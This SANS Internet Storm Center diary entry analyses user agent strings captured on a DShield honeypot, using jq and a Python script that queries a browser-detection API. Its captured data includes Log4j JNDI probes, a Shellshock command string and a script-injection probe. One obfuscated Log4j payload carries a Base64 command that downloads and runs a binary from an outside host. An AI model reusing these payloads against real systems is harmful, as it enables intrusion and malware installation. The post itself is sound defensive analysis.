What is that User Agent?, (Mon, Jan 8th)

Devices are connecting to different web resources on a regular basis. One method to identify what is connecting to a web resource is through a user agent [1] and many are received on DShield [2] honeypots.

 

Figure 1: Popular user agents seen over the last 7 days from a honeypot

 

Some of these user agents are easier to understand than others. They can indicate the version of software used to connect to the web resource and, as seen in the example above, indicate access attempts from researchers.

 

Translating User Agent Strings

There are many resources that translate user agent strings into human-readable information. Many allow manual submission, but to save some time and effort, I wanted to automate this process. I decided to use the WhatIsMyBrowser API [3] to gather data about the user agents collected by one of my honeypots. First, I needed to export the user agents seen by my honeypot, and 'jq' was the tool I decided to use for a quick text export.

# read all web honeypot logs from my archival location
# default storage location for these logs is /srv/db/ on a DShield honeypot
# cat /logs/webhoneypot*.json

# select any user agent values where the value is not blank
# jq -r 'select(.useragent!="")'

# get raw user agent values (without quotes) and output to a text file
# jq -r '.useragent[]' > all_user_agents_historic.txt

cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq -r '.useragent[]' > all_user_agents_historic.txt
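The same export can also be done in Python, which is convenient if the next processing step is a Python script anyway. This is a minimal sketch, assuming (as the jq filter `.useragent[]` suggests) that each log line is a JSON object whose `useragent` field is a list of strings. The function name `extract_user_agents` is illustrative and not part of DShield, and unlike the jq pipeline it skips empty strings and malformed lines.

```python
import glob
import json

def extract_user_agents(log_glob):
    """Yield every non-empty user agent found in JSON-lines honeypot logs."""
    for path in sorted(glob.glob(log_glob)):
        with open(path, "r", encoding="utf-8", errors="replace") as filehandle:
            for line in filehandle:
                try:
                    record = json.loads(line)
                except json.JSONDecodeError:
                    continue  # skip blank, truncated, or malformed lines
                if not isinstance(record, dict):
                    continue
                # Assumption: "useragent" is a list; tolerate a bare string too.
                agents = record.get("useragent") or []
                if isinstance(agents, str):
                    agents = [agents]
                for agent in agents:
                    if agent:
                        yield agent
```

Writing each value returned by `extract_user_agents("/logs/webhoneypot*.json")` to its own line would produce a file equivalent to all_user_agents_historic.txt.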

 

Now that I have all my user agents, I put together a short python script to process the data.

import requests
import json
from collections import Counter

def get_user_agents(file):
    # return every user agent seen (for counting) and the unique set (for API lookups)
    unique_user_agents = set()
    all_headers = []
    with open(file, "r") as filehandle:
        for line in filehandle:
            unique_user_agents.add(line.replace("\n", ""))
            all_headers.append(line.replace("\n", ""))
    return all_headers, unique_user_agents

def get_post_data(user_agent):
    # build the "headers" list expected in the API request body
    header = []
    header.append({
        "name": "USER_AGENT",
        "value": user_agent,
    })
    return header

def request_user_agent_data(header):
    headers = {
        'X-API-KEY': "<redacted>",
    }

    post_data = {
        "headers": header,
    }

    result = requests.post("https://api.whatismybrowser.com/api/v3/detect", data=json.dumps(post_data), headers=headers)
    # keep the raw API response for every request
    save_results(result.text, "results.json")
    try:
        # count|translated user agent|raw user agent
        save_results(
            str(header_counts[header[0]["value"]]) + "|" +
            result.json().get("detection").get("simple_software_string") + "|" +
            header[0]["value"], "basic_results.csv"
        )
    except Exception:
        # no usable detection in the response
        save_results(
            str(header_counts[header[0]["value"]]) + "|" +
            "No results found" + "|" +
            header[0]["value"], "basic_results.csv"
        )

def save_results(result, filename):
    # append one line to the given output file
    with open(filename, "a") as filehandle:
        filehandle.write(result + "\n")

def process_headers(header_list):
    # submit the unique user agents one at a time
    for each_header in header_list:
        request_user_agent_data(get_post_data(each_header))

all_headers, headers_to_send = get_user_agents("all_user_agents_historic.txt")
# header_counts is read as a global inside request_user_agent_data
header_counts = Counter(all_headers)

process_headers(headers_to_send)

 

Some of this was based on the example code in the API documentation [4]. I ran into some issues submitting all of the headers in one request. Instead, this submits all of the unique user agents one at a time and saves the results to a couple of files:

basic_results.csv –> Bar (“|”) delimited text file containing number of times the user agent was seen, translated user agent, raw user agent
results.json –> raw results from every request

There are definitely some efficiencies to be made with the code, but it gave me what I was looking for.
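Once basic_results.csv exists, the summaries in the rest of this diary can be pulled from it with a few lines of Python. The sketch below assumes the bar-delimited layout described above (count, translated user agent, raw user agent); the function names are illustrative. It splits on only the first two bars so that a raw user agent containing "|" stays intact.

```python
def load_results(path):
    """Parse count|translated|raw lines into (count, translated, raw) tuples."""
    rows = []
    with open(path, "r", encoding="utf-8", errors="replace") as filehandle:
        for line in filehandle:
            parts = line.rstrip("\n").split("|", 2)
            if len(parts) != 3 or not parts[0].isdigit():
                continue  # skip lines that do not match the expected layout
            rows.append((int(parts[0]), parts[1], parts[2]))
    return rows

def top_and_bottom(rows, n=10):
    """Return the n most common and the n least common rows by count."""
    ordered = sorted(rows, key=lambda row: row[0], reverse=True)
    return ordered[:n], ordered[-n:]

def untranslated(rows):
    """Return rows the API could not translate."""
    return [row for row in rows if row[1] == "No results found"]
```

Because the script appends to its output files, running it more than once would leave duplicate rows in basic_results.csv, so it may be worth deleting the file between runs.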

 

User Agents Seen on a DShield Honeypot

Before going into some of the specific user agents, some information about the data used:

Time period of data: 8/3/2023 – 1/5/2024 (approximately 5 months of data)
Number of user agent strings: 7,540,306
Number of unique user agent strings: 1,181

Figure 2: Summary of data used for analysis

 

Most Common User Agents

Count | Translated User Agent | Raw User Agent
2303996 | Firefox 22 on Windows 7 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
1702751 | Firefox 93 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
250183 | Chrome 81 on Linux | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
170996 | Chrome 117 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
157401 | Internet Explorer 7 on Windows Vista | Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
138207 | Firefox 60 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
134014 | Go Http Client 1.1 | Go-http-client/1.1
121178 | Chrome 109 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
112378 | ZGrab 0.x | Mozilla/5.0 zgrab/0.x
110627 | Chrome 116 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

Figure 3: Top 10 most common user agents seen on a DShield honeypot

 

The “translated user agent” is much easier to understand. The most popular user agent seen is Firefox 22 on Windows 7. Windows 7 support ended in January of 2020 and Firefox 22 was released in 2013. This could be a very old, outdated device that may also be compromised, or it could be a falsified user agent string. To better understand which hosts are using this specific user agent string, I can take a look at the raw data.

This search used only the last 7 days of data.

# read web honeypot json files
# cat /logs/webhoneypot*.json

# search for values that do not have a blank user agent
# jq -r 'select(.useragent!="")'

# search for our specific user agent string (Windows 7, Firefox 22)
# jq -r 'select(.useragent[]=="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0")'

# output the source IPs, sorted by the number of times the source IP was seen
# jq -r .sip | sort | uniq -c | sort -n

cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq -r 'select(.useragent[]=="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0")' | jq -r .sip | sort | uniq -c | sort -n

831351 80.243.171.172

 

This user agent has only been coming from 80.243.171.172 in the last week. Are there any other user agents that this particular IP is using?

cat /logs/webhoneypot*.json | jq -r 'select(.useragent!="")' | jq 'select(.sip=="80.243.171.172")' | jq -r '.useragent[]' | sort | uniq -c | sort -n
2 QualysGuard
116 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729);
185 ${jndi:nis://10.10.11.42:42643/QUALYSTEST}
207 ZX-80 SPECTRUM
263 ${jndi:corba://10.10.11.42:35625/QUALYSTEST}
439 ${jndi:http://10.10.11.42:43608/QUALYSTEST}
457 Java/1.8.0_102
496 Java/1.8.0_161
528 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
769 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
892 curl/7.55.1
964 ${jndi:ldap://10.10.11.42:37161/QUALYSTEST}
1017 ${jndi:ldaps://10.10.11.42:33141/QUALYSTEST}
1069 ${jndi:nds://10.10.11.42:43608/QUALYSTEST}
1105 ${jndi:ldaps://10.10.11.42:42091/QUALYSTEST}
1368 ${jndi:dns://10.10.11.42:42643/QUALYSTEST}
1500 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
1525 ${jndi:iiop://10.10.11.42:35625/QUALYSTEST}
1669 ${jndi:rmi://10.10.11.42:42091/QUALYSTEST}
1791 ${jndi:nis://10.10.11.42:45742/QUALYSTEST}
2653 ${jndi:rmi://10.10.11.42:33141/QUALYSTEST}
2794 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101
3062 ${jndi:dns://10.10.11.42:45742/QUALYSTEST}
3253 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
3305 Node.js
3642 Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
3805 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
3862 : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
3875 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
3889 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
4115 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
4374 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
4467 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
4475 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
4596 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
4615 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
4625 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
4868 Gecko/20100914
4894 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
5036 Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
5222 () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id
5612 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
6442 curl/7.29.0
6652 gSOAP/2.8
6729 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
7534 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14)
7721 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
8052 Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
8073 Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
8230 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101
8644 curl/7.60.0
8649 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
8819 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
9145 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
9326 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
9853 Mozilla/5.0
10708 <script>alert(Qualys)</script>
12703 curl/7.47.0
13541 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0
13746 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
15824 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
17642 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
18622 Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
19283 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
19708 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)
22817 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
32794 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
39371 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
40764 Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
74931 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
93445 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
831351 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
864153 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
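Both jq searches above (source IPs for one user agent, and user agents for one source IP) can also be written in Python. This is a sketch under the same assumptions the jq filters make: one JSON object per line, a `sip` field holding the source IP, and a `useragent` field holding a list of strings. The helper names are illustrative. Unlike the jq pipeline, `count_source_ips` counts a record once even if the user agent appears in it more than once.

```python
import glob
import json
from collections import Counter

def iter_records(log_glob):
    """Yield each JSON object found in the matching JSON-lines log files."""
    for path in sorted(glob.glob(log_glob)):
        with open(path, "r", encoding="utf-8", errors="replace") as filehandle:
            for line in filehandle:
                try:
                    record = json.loads(line)
                except json.JSONDecodeError:
                    continue  # skip blank or malformed lines
                if isinstance(record, dict):
                    yield record

def agents_of(record):
    """Return the record's user agents as a list (assumed field: useragent)."""
    agents = record.get("useragent") or []
    return [agents] if isinstance(agents, str) else list(agents)

def count_source_ips(log_glob, user_agent):
    """Count records per source IP that carried the given user agent."""
    counts = Counter()
    for record in iter_records(log_glob):
        if user_agent in agents_of(record):
            counts[record.get("sip")] += 1
    return counts

def count_user_agents(log_glob, source_ip):
    """Count every user agent sent by the given source IP."""
    counts = Counter()
    for record in iter_records(log_glob):
        if record.get("sip") == source_ip:
            counts.update(agents_of(record))
    return counts
```

Calling `count_user_agents("/logs/webhoneypot*.json", "80.243.171.172").most_common()` would list the same user agents as the jq output, ordered from most to least frequent.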

 

Based on the data, it looks like this might be a Qualys scan [5]. Using different user agent strings to access web resources can be particularly helpful to determine vulnerabilities and work around security controls. For example, some websites may block access to their resources if an automated tool like curl is used. However, this can be easily circumvented [6].
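To illustrate why a user agent string cannot be taken as proof of what is actually connecting, here is a small sketch using Python's standard library. It only builds a request object and does not send anything; the URL is a placeholder and the function name is illustrative.

```python
import urllib.request

def build_request(url, user_agent):
    """Build (but do not send) a request carrying the chosen User-Agent header."""
    return urllib.request.Request(url, headers={"User-Agent": user_agent})

request = build_request(
    "https://example.com/",  # placeholder URL
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
)

# urllib stores header names capitalized as "User-agent"
print(request.get_header("User-agent"))
```

The client decides what this header says, so a script can present itself as any browser version it likes.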

 

Least Common User Agents

Count | Translated User Agent | Raw User Agent
1 | Chrome 92 on Android 11 | Mozilla/5.0 (Linux; Android 11; ONEPLUS A6000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36
1 | Chrome 56 on Windows 8 | Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3037.63 Safari/537.32
1 | Safari 10 on Mac OS X (Yosemite) | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/10.0 Safari/602.1.50
1 | Chromium 75 on Ubuntu Linux | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/75.0.3770.142 Chrome/75.0.3770.142 Safari/537.36
1 | Chrome 72 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36
1 | No results found | t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.248[.]104:2213/TomcatBypass/Command/Base64/d2dldCAtTyAvdG1wL3BhcmFpc28ueDg2IGh0dHA6Ly91cGRhdGUuZXRlcm5pdHlzdHJlc3Nlci54eXovZG93bmxvYWQvYmlucy9wYXJhaXNvLng4NiA7IGN1cmwgLW8gL3RtcC9wYXJhaXNvLng4NiBodHRwOi8vdXBkYXRlLmV0ZXJuaXR5c3RyZXNzZXIueHl6L2Rvd25sb2FkL2JpbnMvcGFyYWlzby54ODYgOyBjaG1vZCAreCAvdG1wL3BhcmFpc28ueDg2IDsgY2htb2QgNzc3IC90bXAvcGFyYWlzby54ODYgOyAvdG1wL3BhcmFpc28ueDg2IHg4NiA7IHJtIC1yZiAvdG1wL3BhcmFpc28ueDg2}')
1 | Edge 118 on Android 11 | Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.4430.91 Mobile Safari/537.36 Edg/118.0.0.0
1 | Chrome 101 on Windows 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
1 | Chrome 19 on iOS 5.1 | Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3
1 | Android Browser 3.1 on Android (Cupcake) | HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5  (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1

Figure 4: Top 10 least common user agents seen on a DShield honeypot

 

One of these results is a user agent that was not found through the API and was listed as “No results found”. This looks like a Log4j attack that directs the target to 193.111.248[.]104 on port 2213 and carries a Base64-encoded command. Any items that did not have a result could be a good place to look for customized user agents and attacks.
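Strings like this are easier to read once the obfuscation is removed. The sketch below shows one possible approach, not a complete Log4j deobfuscator: it collapses lookups of the form `${name:-default}` to their default value and decodes whatever follows a `/Base64/` path segment. The function names are illustrative, and the sample uses a harmless command and a documentation-only IP address (192.0.2.1) rather than the captured payload.

```python
import base64
import re

# Matches a lookup with a default value, e.g. ${env:NaN:-j}, and captures the default.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")

def collapse_default_lookups(text):
    """Replace each ${name:-default} lookup with its default until none remain."""
    previous = None
    while previous != text:
        previous = text
        text = DEFAULT_LOOKUP.sub(lambda match: match.group(1), text)
    return text

def decode_base64_command(text):
    """Return the decoded text that follows a /Base64/ path segment, or None."""
    match = re.search(r"/Base64\s*/([A-Za-z0-9+/=\s]+)", text)
    if match is None:
        return None
    encoded = "".join(match.group(1).split())  # drop any wrapped-line whitespace
    encoded += "=" * (-len(encoded) % 4)       # restore padding if it was trimmed
    return base64.b64decode(encoded).decode("utf-8", errors="replace")

# Harmless stand-in for a captured user agent (hypothetical host and command).
sample_command = base64.b64encode(b"echo harmless-test").decode("ascii")
sample = (
    "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}"
    "//192.0.2.1:2213/TomcatBypass/Command/Base64/" + sample_command + "}"
)

print(collapse_default_lookups(sample))
print(decode_base64_command(sample))
```

Decoded commands should only be read, never executed, and any hosts they reference are worth treating as indicators to investigate.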

 

User Agents Not Found

Count | Translated User Agent | Raw User Agent
53175 | No results found | 'Cloud mapping experiment. Contact research@pdrlabs[.]net'
38409 | No results found | Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks[.]com
15048 | No results found | gSOAP/2.8
14492 | No results found | <script>alert(Qualys)</script>
12540 | No results found | Hello World
9009 | No results found | () { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id
6929 | No results found | Gecko/20100914
5170 | No results found | Node.js
4612 | No results found | Sun Web Console Fingerprinter/7.15
3062 | No results found | ${jndi:dns://10.10.11.42:45742/QUALYSTEST}

Figure 5: Top 10 most common user agents without a translated match, seen on a DShield honeypot

 

There are indications of research scans, vulnerability scans, web attacks and perhaps some user agents that simply aren’t defined yet in the resource that was used. Taking out any of the Log4j attacks and a couple of derogatory items, these were the user agents without any results found:

<script>alert(Qualys)</script>
A
Abcd
abuse.xmco[.]fr
Adobe Application Manager 2.0
asusrouter–
‘Cloud mapping experiment. Contact research@pdrlabs[.]net’
Dark
DoCoMo/2.0 SH901iC(c100;TB;W24H12)
Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks[.]com
fasthttp
Gecko/20100914
gSOAP/2.8
hacked-by-matrix
Hello World
Hello World/1.0
Hello, world
Hello, World
https://aff[.]rip/?affiliate_id=9345&keyword=tech+discord+server
https://affgate[.]top/landing/aff/
https://discordservers[.]su/
Kryptos Logic Telltale – telltale.kryptoslogic[.]com
l9tcpid/v1.1.0
masscan/1.0 (https://github[.]com/robertdavidgraham/masscan)
masscan/1.3 (https://github[.]com/robertdavidgraham/masscan)
masscan-ng/1.3 (https://github[.]com/bi-zone/masscan-ng)
Microsoft URL Control – 6.00.8862
MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0
Mozila/5.0
nekololis-owned-you
Node.js
NukeBotC2
Offline Explorer/2.5
pOrT.sCaNnInG.iS.nOt.A.cRiMe
QualysGuard
r00ts3c-owned-you
SEC-SGHX210/1.0 UP.Link/6.3.1.13.0
Sun Web Console Fingerprinter/7.15
t.me/DeltaApi
the beast
WDG_Validator/1.6.2
WebCopier v4.6
webprosbot/2.0 (+mailto:abuse-6337@webpros[.]com)
WebZIP/3.5 (http://www.spidersoft[.]com)
Xenu Link Sleuth/1.3.8
xfa1
ZX-80 SPECTRUM
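A quick first pass over a list like this is to flag strings that contain well-known attack markers. The sketch below is a simple heuristic built from patterns that appear in this diary's data; the marker list and labels are illustrative choices, not a complete detection rule set, and obfuscated strings would need to be normalized before they match.

```python
# Illustrative markers taken from user agents seen in this data set.
ATTACK_MARKERS = {
    "${jndi:": "Log4j JNDI lookup",
    "() {": "Shellshock-style function definition",
    "<script>": "script injection probe",
}

def flag_user_agent(user_agent):
    """Return a label for each known marker found in the user agent string."""
    lowered = user_agent.lower()
    return [label for marker, label in ATTACK_MARKERS.items() if marker in lowered]

for candidate in ["<script>alert(Qualys)</script>", "Hello World", "gSOAP/2.8"]:
    print(candidate, flag_user_agent(candidate))
```

Anything left unflagged still deserves a look, since names such as NukeBotC2 or hacked-by-matrix are suspicious without matching any pattern.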

Any of these user agents would be interesting to look into in more depth. Understanding the user agent strings accessing web resources can help to uncover suspicious activity. In addition, understanding the user agents coming from your network can also help uncover applications that reside on devices and the devices themselves.

Figure 6: User agents identifying a Roku TV

 

[1] https://en.wikipedia.org/wiki/User_agent
[2] https://isc.sans.edu/honeypot.html
[3] https://developers.whatismybrowser.com/api/
[4] https://developers.whatismybrowser.com/api/docs/v3/sample-code/python/detect/
[5] https://www.qualys.com/apps/web-app-scanning/
[6] https://phoenixnap.com/kb/curl-user-agent


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.